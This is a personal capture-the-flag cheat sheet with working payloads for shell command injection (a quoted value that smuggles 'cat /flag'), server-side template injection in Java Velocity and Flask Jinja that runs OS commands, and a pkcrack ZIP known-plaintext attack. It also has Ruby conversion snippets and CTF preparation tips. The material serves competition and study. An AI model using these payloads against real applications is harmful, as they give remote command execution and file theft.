# CTF # XML injection # XXE * [XML External Entity](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md#exploiting-xxe-to-retrieve-files) ```xml ]> &test; ``` # CMD injection ## Shell single quote For ```sh date '$FORMAT' ``` FORMAT ``` '; cat /flag' ``` Gives ```sh date ''; cat /flag'' ``` # ZIP cracking # Known plaintext (file) * https://github.com/keyunluo/pkcrack Need one exact file in plaintext from the encrypted archive. The ZIP archive encrypts each file individually but using same key, so one can list contents and file sizes before and after compression. ```sh pkcrack -C web_labyrinth_linguist.zip -c challenge/src/main/resources/static/font/Ancient_G_Written.ttf -P web_labyrinth_linguist-plain.zip -p challenge/src/main/resources/static/font/Ancient_G_Written.ttf -d web_labyrinth_linguist-decrypt.zip -a ``` Make sure that encrypted and plaintext ZIP archive file size after compression is the same (same compression settings). ``` zip -9 -r web_labyrinth_linguist-plain.zip challenge unzip -lvv web_labyrinth_linguist-plain.zip | grep Ancient unzip -lv web_labyrinth_linguist.zip | grep Ancient ``` # SSTI - Server Side Template Injections # Server Side Template Injections * [Template injections examples](https://book.hacktricks.wiki/en/pentesting-web/ssti-server-side-template-injection/index.html) ## Java - Velocity * Runs command * Gets `String([binary], encoding)` constructor (we can't call `new` in context of template) * Calls constructor to convert binary array of command output to UTF-8 string for printing ``` ---- #set($name="bar") #set($p=$name.getClass().forName("java.lang.Runtime").getRuntime().exec("cat /flag.txt")) $p.waitFor() $p.toString() #set($sc=$name.getClass().getConstructor($name.getClass().forName("[B"), $name.getClass())) #set($b=$sc.newInstance($p.inputStream.readAllBytes(), "UTF-8")) === $b.toString() === 3 ---- ``` # Python - Flask Jinja ## Using request object for shell ```python {{ request.application.__globals__.__builtins__.__import__('os').popen('cat /app/flag.txt').read() | safe }} ``` ## Query databse Assuming `User` DB object is passed to context: ```python {{ User.query.filter_by(username="admin").first().email }} ``` # IRB # Chunk ``` s.scan(/......./) ``` # Binary to integer ``` s.to_i(2) ``` # Integer to ASCII character ``` 123.chr ``` # Hex to integer ``` "7D".to_i(16) ``` # Integer to hex ``` 125.to_s(16) ``` # CTF Preparation 1. Prepare your own hot-spot or VPN: local Wi-Fi may interfere or block manipulated requests. 2. Set up a public web server with valid TLS for use in CTF challenges like XSS or data exfiltration; ideally with access to request log. 3. Prepare PWN scripts that can use `netcat` or run local processes and debuggers and send payloads in response to input data. 4. Prepare tools for: - Image forensics - Data conversion like Base64, HEX etc; e.g. CyberChef. - Extracting data from files; like cutting or replacing headers etc. - cURL script for sending encoded query strings or posting forms 5. Check latest exploitation methods blogs and collect tools from them. 6. Water bottle with electrolytes, coffee, sugar bars.